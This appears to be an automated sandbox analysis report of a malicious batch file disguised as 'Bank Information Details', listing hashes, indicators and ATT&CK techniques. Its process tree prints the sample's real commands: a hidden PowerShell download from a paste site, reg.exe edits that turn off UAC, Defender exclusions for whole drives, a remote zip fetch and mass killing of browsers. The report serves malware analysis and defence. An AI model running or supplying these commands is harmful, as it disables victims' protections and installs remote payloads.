Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07-11-2024 05:45
Static task
static1
Behavioral task
behavioral1
Sample
Bank Information Details.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Bank Information Details.bat
Resource
win10v2004-20241007-en
General
-
Target
Bank Information Details.bat
-
Size
41KB
-
MD5
a2539089ecc2f92f81908c88ab2b2938
-
SHA1
9a18b58b8fc22ec070434020c537f4bfa5c57973
-
SHA256
155b933fb9fe44c971a042e6539d8544616f908960177e7922eee1c943008ab9
-
SHA512
07a1a04a25c9063e8ba14b516b768906b115ae21d1133f01f8f4b7674e512bd876a5109d26aa1d78d91cbf3e7c9c730d6921f6cd95ab0ff5a5f58331a17dad40
-
SSDEEP
768:OfxzLnYe9TQ7lOYSeIAeIF3k54J9Ti1KcTtb2w80P+RTXH7hhb:qxzLnYe9TQ7lOYSeIAeIF3k54J9Ti1Kx
Malware Config
Extracted
https://paste.fo/raw/024749876411
Signatures
-
Processes:
reg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 2980 powershell.exe 7 2980 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2980 powershell.exe 2776 powershell.exe 1972 powershell.exe 1248 powershell.exe 1200 powershell.exe 2944 powershell.exe 1424 powershell.exe 1604 powershell.exe -
Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs
Possible Turn off User Account Control's privilege elevation for standard users.
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
Processes:
flow ioc 12 raw.githubusercontent.com 17 raw.githubusercontent.com 9 raw.githubusercontent.com 11 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
IEXPLORE.EXEdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 276 timeout.exe 1140 timeout.exe -
Kills process with taskkill 12 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2056 taskkill.exe 2704 taskkill.exe 2712 taskkill.exe 2788 taskkill.exe 2016 taskkill.exe 696 taskkill.exe 1512 taskkill.exe 2708 taskkill.exe 2660 taskkill.exe 1660 taskkill.exe 2920 taskkill.exe 2088 taskkill.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{73F1A871-9CCB-11EF-9CB9-62CAC36041A9} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe -
Modifies registry key 1 TTPs 12 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1300 reg.exe 2312 reg.exe 2300 reg.exe 2560 reg.exe 1140 reg.exe 860 reg.exe 1464 reg.exe 1952 reg.exe 552 reg.exe 2248 reg.exe 2564 reg.exe 2356 reg.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2980 powershell.exe 2776 powershell.exe 2776 powershell.exe 2776 powershell.exe 1248 powershell.exe 1200 powershell.exe 2944 powershell.exe 1424 powershell.exe 1604 powershell.exe 1972 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe7z.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2980 powershell.exe Token: SeDebugPrivilege 2776 powershell.exe Token: SeDebugPrivilege 1248 powershell.exe Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 2944 powershell.exe Token: SeDebugPrivilege 1424 powershell.exe Token: SeDebugPrivilege 1604 powershell.exe Token: SeDebugPrivilege 1972 powershell.exe Token: SeRestorePrivilege 2304 7z.exe Token: 35 2304 7z.exe Token: SeSecurityPrivilege 2304 7z.exe Token: SeDebugPrivilege 2016 taskkill.exe Token: SeDebugPrivilege 696 taskkill.exe Token: SeDebugPrivilege 1512 taskkill.exe Token: SeDebugPrivilege 1660 taskkill.exe Token: SeDebugPrivilege 2920 taskkill.exe Token: SeDebugPrivilege 2088 taskkill.exe Token: SeDebugPrivilege 2056 taskkill.exe Token: SeDebugPrivilege 2704 taskkill.exe Token: SeDebugPrivilege 2708 taskkill.exe Token: SeDebugPrivilege 2660 taskkill.exe Token: SeDebugPrivilege 2712 taskkill.exe Token: SeDebugPrivilege 2788 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 680 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 680 iexplore.exe 680 iexplore.exe 1620 IEXPLORE.EXE 1620 IEXPLORE.EXE 1620 IEXPLORE.EXE 1620 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.exepowershell.execmd.exeiexplore.exedescription pid process target process PID 2112 wrote to memory of 2904 2112 cmd.exe cmd.exe PID 2112 wrote to memory of 2904 2112 cmd.exe cmd.exe PID 2112 wrote to memory of 2904 2112 cmd.exe cmd.exe PID 2904 wrote to memory of 2980 2904 cmd.exe powershell.exe PID 2904 wrote to memory of 2980 2904 cmd.exe powershell.exe PID 2904 wrote to memory of 2980 2904 cmd.exe powershell.exe PID 2904 wrote to memory of 2776 2904 cmd.exe powershell.exe PID 2904 wrote to memory of 2776 2904 cmd.exe powershell.exe PID 2904 wrote to memory of 2776 2904 cmd.exe powershell.exe PID 2776 wrote to memory of 2680 2776 powershell.exe cmd.exe PID 2776 wrote to memory of 2680 2776 powershell.exe cmd.exe PID 2776 wrote to memory of 2680 2776 powershell.exe cmd.exe PID 2680 wrote to memory of 2564 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2564 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2564 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2560 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2560 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2560 2680 cmd.exe reg.exe PID 2904 wrote to memory of 680 2904 cmd.exe iexplore.exe PID 2904 wrote to memory of 680 2904 cmd.exe iexplore.exe PID 2904 wrote to memory of 680 2904 cmd.exe iexplore.exe PID 2904 wrote to memory of 276 2904 cmd.exe timeout.exe PID 2904 wrote to memory of 276 2904 cmd.exe timeout.exe PID 2904 wrote to memory of 276 2904 cmd.exe timeout.exe PID 2680 wrote to memory of 1140 2680 cmd.exe reg.exe PID 2680 wrote to memory of 1140 2680 cmd.exe reg.exe PID 2680 wrote to memory of 1140 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2356 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2356 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2356 2680 cmd.exe reg.exe PID 2680 wrote to memory of 860 2680 cmd.exe reg.exe PID 2680 wrote to memory of 860 2680 cmd.exe reg.exe PID 2680 wrote to memory of 860 2680 cmd.exe reg.exe PID 2680 wrote to memory of 1464 2680 cmd.exe reg.exe PID 2680 wrote to memory of 1464 2680 cmd.exe reg.exe PID 2680 wrote to memory of 1464 2680 cmd.exe reg.exe PID 2680 wrote to memory of 1300 2680 cmd.exe reg.exe PID 2680 wrote to memory of 1300 2680 cmd.exe reg.exe PID 2680 wrote to memory of 1300 2680 cmd.exe reg.exe PID 2680 wrote to memory of 1952 2680 cmd.exe reg.exe PID 2680 wrote to memory of 1952 2680 cmd.exe reg.exe PID 2680 wrote to memory of 1952 2680 cmd.exe reg.exe PID 680 wrote to memory of 1620 680 iexplore.exe IEXPLORE.EXE PID 680 wrote to memory of 1620 680 iexplore.exe IEXPLORE.EXE PID 680 wrote to memory of 1620 680 iexplore.exe IEXPLORE.EXE PID 680 wrote to memory of 1620 680 iexplore.exe IEXPLORE.EXE PID 2680 wrote to memory of 552 2680 cmd.exe reg.exe PID 2680 wrote to memory of 552 2680 cmd.exe reg.exe PID 2680 wrote to memory of 552 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2300 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2300 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2300 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2312 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2312 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2312 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2248 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2248 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2248 2680 cmd.exe reg.exe PID 2680 wrote to memory of 1248 2680 cmd.exe powershell.exe PID 2680 wrote to memory of 1248 2680 cmd.exe powershell.exe PID 2680 wrote to memory of 1248 2680 cmd.exe powershell.exe PID 2680 wrote to memory of 1200 2680 cmd.exe powershell.exe PID 2680 wrote to memory of 1200 2680 cmd.exe powershell.exe PID 2680 wrote to memory of 1200 2680 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Bank Information Details.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Bank Information Details.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/024749876411', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Bank Information Details.bat'))"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /4⤵
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:2564
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f5⤵
- Hijack Execution Flow: Executable Installer File Permissions Weakness
- Modifies registry key
PID:2560
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:1140
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:2356
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:860
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:1464
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:1300
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:1952
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:552
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:2300
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:2312
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:2248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://raw.githubusercontent.com/wada123wada/shsfdhdgh/refs/heads/main/NOTICE.zip3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:680 CREDAT:275457 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1620
-
-
-
C:\Windows\system32\timeout.exetimeout /t 93⤵
- Delays execution with timeout.exe
PID:276
-
-
C:\Program Files\7-Zip\7z.exe"C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\NOTICE.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria009633⤵
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
-
C:\Windows\system32\timeout.exetimeout /t 93⤵
- Delays execution with timeout.exe
PID:1140
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:696
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM iexplore.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM opera.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM safari.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM brave.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vivaldi.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epic.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM yandex.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM tor.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM CMD.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5157b713dd1c58d31b01d6a29dd935546
SHA1220a5bcd94d3e91a34cc9b1682b16a493ecea5f6
SHA2568af4172d2b4884dfd457e568135b09deafd0bb8516832f2f0f776be9977fded9
SHA512e1817d205f400fbf22dfcbc27f17c61f22e69383100b0743163abe110e92c23c82bfcbefc4ffca9df6ef74bdf6c3d03f1c00df29e4d1455f3e9426a7e904f72e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD533b6e3828beadafc181b5b08c46653bc
SHA1489c832ab724b5e22d40aff678e7ec6c19b302f3
SHA256ae98448304cf1a176cfd0af751741332fb7427c05f35074a2d296f30e5002c16
SHA5121729613dbf7a0d2ee36af0cc86dbb07115bd88b3577bba703bf536075c78d183bd84eb2987a089be4c157b2204d5932df85198274d8f629d6bfdf5c4579a7946
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD51a1bfb5b52d0435752f5732826d5b50b
SHA1bf337752501c117dc4fd99049a97b368770f492f
SHA25607e039e4dffe6eecc450201b7bf18b033436d07f4a15220b2abbeb4ed05d3ac1
SHA512beee3467b7bcf3b65eec78b01902093a8f882d1ea45eebd38c19b1e76e9e5e9bf44caad650e5675d2751e90b73e757e5d712fa4619912b9bd3e5c14ee8b7ef82
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5a2408197f542b64aa481eb6d5ac18174
SHA1b7192edc1190dd3b3327d1f8c41a9c5cf56af0c2
SHA25611eaa2fbc8bfd71d26967e382ec9e3179539cd4c7effcd874a92578422a3850c
SHA5121deb8feb01f2b24e97f4f16fd19dc4f3d3d29857f6b019b4c27fd73f125b919965f3d4e6db066f702bac0c99a5a9e5095f9f8c54142eb050611a7abf5b6ec04b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5c936933dace1edb211087919628bfb85
SHA194cd620e530965e7ae606a1effefa757addaf946
SHA2569372125c68787f8837704db95212869ea32d278447ce5097033d59a4ed0eacc9
SHA5122d838d3c990e48dd4824e4bbd0639e0a14e0cb94b87e358818ca77a473e9d34507901ffc6e5a7aedee93eb662141a098b6acc433b408de2bcc4f90d631daaffe
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD54786f0df1d39b8897fe6fb969a9c3d91
SHA110dd25628508cc1e301ff1ad07bc09e16d886c4d
SHA256cf6c75cdc9475234d210bde0911ba164f9e2d4e885c5c6b61188f9110dd42cea
SHA51286c4b89a9ac00d3b0785b7b402d037c791992a97dae2f042857240f7f682fdee15fe1f6445ab25e7fb171b2e07b6d007ffbac0b414f1eeb228115e69a2f637ca
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD51af56ffac2119ecebd6cbb9062f399c6
SHA1dc895851972c2d659b7e92baf290df726f0e85a1
SHA256bdb7ad1938f08710bc6b70a9c1097e373059636e38f22ece16836da92d5f6d3f
SHA512fe77c3185366d1b6beff799e3d09ae1f677c909120ea6ea34b47134f6a0e57ba820434469fb89e62def1f9afa7871a5eae71b8cc872dd1e618f6d79acad13c6c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD534f8d20c9aa61ebbe3f1298b4c3e5b2b
SHA1c9731c4b963b16f8959d63221ff0db7109d22642
SHA256f080d587f617d0e314959de8a4a31d49eb367f4cda32df8144681b9d2a6d7d2c
SHA5122ee4798e4ee310502364b8f03a33b1c6651600313d6fe670c5f82b227006a9e3ed8af11351cff301a95f9b7b46f8ec19ffb00cb2a33746ac10d1d19c22030d07
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5006a694e9081f427d4865df92b891ece
SHA1069071d896e117486fa360b58df6d6f4049bd2e3
SHA256510a09471b53f85f87016e88aa907c0274c1955c721dd74e0d5f495f6b1881ba
SHA5121148dd13cfe9729849ff334594401337240cbc2b070a6ff5f62f11731b94f31f4fb6ba9cbec2a436808557d593ffacb7c57b537e3b0c637913c7b7ef9dc2814d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD550c07aa1cba07581cd282bb4de54e8ed
SHA118d4b00e49fcd74a487b2e92ce3dff6e0045ed7a
SHA2563dfb46437f487f16c2350fc4ad5b1356f98577fd71d5ea4866097f10cd17fed3
SHA51298e8ab27c3360583ed77b6ddbd6be537e06bf6e60ba9e9989f6778301e91c02c9284dbe90262faf41fc539903b82f0978ae117b4a0d3a83d5349968027c3ca77
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD53aaea6a0fefa0dd2c3445d7d427d7171
SHA17cda3f97f672ec6e67c7d8b0307fe21c7e299d24
SHA2561d5f7cb493acf9b3263c55f4be317638b7bd4dcd95f3e6c3cf4eed774d9da1e7
SHA51216e7cf692fba6db02b8691b915e9070670acfa0e7b9baaa372bd54ba583e503a2bac81df704569509b7b33f99aa8b66c5af8c9ce5d3389beab0c78d728edc2ad
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5ea782d630f36cf308ca3b2b32aa2b481
SHA1c841487be8fbaff01e9768a91204138ba106622c
SHA25679df5e6af0eb22dca6baab33ac4aa8a5d843927a30dba6dc09fc6961ba36b8ee
